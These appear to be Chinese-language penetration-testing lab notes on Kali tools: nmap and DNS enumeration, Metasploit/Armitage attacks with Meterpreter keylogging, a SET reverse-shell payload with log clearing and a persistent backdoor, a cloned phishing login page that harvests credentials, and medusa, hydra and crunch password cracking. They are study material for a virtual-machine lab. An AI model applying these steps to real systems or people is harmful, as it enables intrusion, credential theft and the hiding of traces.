nmap(网络连接端扫描软件)
作为一个漏洞探测器和安全扫描器
命令:
[nmap支持多个端口扫描,不连续的端口用“,”隔开,eg :“80 ,22,3306”;连续的端口用“–”连接,eg:“1-3309”]
nmap -traceroute 域名 对目标主机进行路由追踪
nmap -sP ip地址 识别活跃主机
nmap -sn ip地址 存活的主机
nmap -sV ip地址 扫描所开放的端口
nmap -O ip地址 获取操作系统信息
nmap -P ip地址 指定端口范围内运行的服务
DNS枚举工具(被动收集信息)
dnsenum (域名信息收集工具)
通过谷歌(默认)或者字典文件猜测可能存在的域名,并对一个网段进行反向查询。
dnsenum -h 查看帮助信息
dnsenum enum 域名 枚举域名的相关信息
dnsesnum --threads 数字 域名 设置线程数(填写合适的数字)
dnsesnum -w 域名 允许用户启用WHOIS请求
fierce
fierce -h 查看帮助信息
fierce --subdomains 域名 枚举域名的相关信息
fierce --domain 域名 设置目标
fierce --dns-server 域名 设置域名解析服务器
使用armtiage渗透测试
1、虚拟机为NAT模式
2、虚拟机与物理机ping通(若没有,看物理机是否打开了虚拟机的网卡)
3、启动metasploit服务 命令:msfconsole(无图形化界面,终端模式)
启动armtiage工具 在菜单栏中搜索armtiage,点击图标(进入图形化界面)
在图形化界面中
Hosts——Nmap Scan ——Quick Scan 快速扫描
对本机进行攻击分析:点击本机图标,进行nmap扫描
Hosts——Nmap Scan ——Quick Scan (OS detect)——本机IP地址 进行nmap扫描,探测目标操作系统版本
选择预置模块exploit/windows/browser/adobe_cooltype_sing,双击选择进行攻击
在终端模式下(虚拟机kali和win7靶机)
准备工作:在靶机中打开PHP,设置MySQL服务器,允许用户远程登录(修改用户主机,采用%作为通配符)
win7靶机和kali为NAT模式
在kali中创建用户名字典文件和密码字典文件
1、启动终端模式 命令:msfconsole
2、搜索扫描的服务模块 命令:search 模块
3、看自己想要的模块 使用序号,命令 :use 模块序号
4、查看登录扫描模块的选项参数,命令:show options
5、设置扫描目标的IP地址 ,命令:set rhosts ip地址
6、设置攻击机的IP地址,命令:set srvhost ip地址
7、设置加载用户名字典文件 ,命令:set user_file 用户名字典文件路径
8、设置加载用户密码字典文件,命令:set pass_file 用户密码字典文件路径
9、启动渗透测试,命令:run/exploit -j
10、Meterpreter监听键盘记录,命令: shell——keyscan_start(在靶机中可新建文档,输入文字数字等) ——keyscan_dump(记录就出来了)
11、测试用户是否远程连接,在终端模式(cmd),命令:mstsc (登录连接就行)
社会工程学工具包(进行渗透攻击)
准备工作:攻击机和靶机为NAT模式
2、选择攻击——社会工程学 Social - Engineering Attacks set > 1
3、选择攻击载荷和监听器 Create a Payload and Listener set > 4
4、选择加载攻击载荷 Windows Reverse_TCP Meterpreter set >2
5、设置反弹式shell的攻击主机IP地址
6、设置反弹式shell的攻击主机监听端口
7、传递攻击载荷给目标机 eg:在/root/.set中的payload.exe
8、目标机运行攻击载荷 eg:在靶机浏览器登录攻击机的IP地址/payload.exe ,运行文件
9、查看活跃会话 , 命令: sessions
10、创建和使用后门程序,进入shell环境,命令:sessions -i 1
在meterpreter > 之后进入,命令:shell (有乱码情况,输入 chcp 65001)
收集目标数据 , 命令: sysinfo
清除痕迹 ,命令: clearev (可在win7靶机的 计算机管理——Windows日志——安全 中查看是否清除痕迹)
创建持久后门,命令:run persistence -U -A -X -i 10 -p 端口号 -r
测试持久后门,在结果中找到脚本executing script 后面的文件路径,在win7靶机中查看是否存在
使用web攻击向量构建钓鱼网站
准备 工作:攻击机和靶机为NAT模式
1、启动社会工程学工具包 ,命令:setoolkit
2、选择攻击——社会工程学 Social - Engineering Attacks set > 1
3、选择web攻击向量 Website Attack Vectors set > 2
4、选择攻击方法 Credential Harvester Attack Method set:webattack > 3
5、选择网站克隆 Site Cloner set: webattack > 2
6、设置攻击机IP地址
7、 设置克隆的网页(可在物理机上登录网页登录页面,复制其路径)
8、靶机访问钓鱼网站(直接访问攻击机的IP地址)
9、在钓鱼网站上登录用户和密码,攻击机会检测到用户名和密码
10、查看相关信息,命令: cat /root/.set/reports/*.xml
medusa工具的使用
准备工作:攻击机和靶机为NAT模式
1、打开medusa工具,命令: medusa -h
2、各参数的含义:
-h:指定目标主机名或者目标IP地址
-H:指定目标主机名或者目标IP地址文件
-u:指定用户名
-U:指定用户名文件
-p:指定密码
-P:指定密码文件
-c:指定要执行的命令,在成功登录后执行特定操作
-O:指定输出文件的路径,将破解结果保存到该文件中
-e:指定额外的密码检查,取值为n(空密码)、s(用户名=密码)、 ns(同时检查空密码和用户名=密码)
-M:指定协议模块
-m:指定额外的模块特定参数
-d:启用调试模式,输出更多详细的调试信息。
-n:指定目标服务的端口号
-s:指定目标服务的 SSL 端口号
-g:显示模块的通用选项
-r:指定重试次数,当连接失败时尝试重新连接的次数
-R:从指定的检查点继续破解,用于恢复之前中断的破解任务
-t:指定每个主机的并行线程数
-T:指定全局的并行线程数,控制所有目标主机的总线程数
-L:指定每个目标主机的最大登录尝试次数
-f:匹配成功后,停止对当前主机的破解尝试
-F: 匹配成功后停止整个破解任务
-b:指定模块的备用参数
-q:安静模式,减少输出信息
-v:显示信息等级(有0-6个等级)
-w:错误调试级别(有0-10个级别)
-V:显示版本信息
-Z:指定恢复文件的路径,用于恢复之前中断的破解任务
1、打开medusa工具 ,命令:medusa -h
密码生成工具crunch的使用
crunch <min> <max> [charset] [options]
<min>:生成密码的最小长度
<max>:生成密码的最大长度
[charset]:字符集,可省略,默认是数字和大小写字母
-o:将生成的密码保存到指定文件
-t: 指定密码的格式,使用占位符(如^)
-l: 当使用-t
时,用于替换占位符
-d: 限制相同字符连续出现的最大次数.
-s: 指定从哪个密码开始生成
-c: 设置产生的密码个数
占位符: @ 小写字母
,(逗号)大写字母
% 数字
^ 特殊符号
1、启动crunch工具,命令:crunch
2、查看各参数的含义,命令:man crunch
hydra工具的用法
-l:指定一个用户名
• -L:指定用户名文件路径
• -p:指定一个密码
• -P:指定密码文件路径
• -e:尝试空密码(n)、使用用户名作为密码(s)、反向密码(r)
• -o:将破解结果输出到指定文件
• -t:指定并发任务数,默认16
• -f:当找到第一个有效密码时停止破解
• -s:指定服务的端口号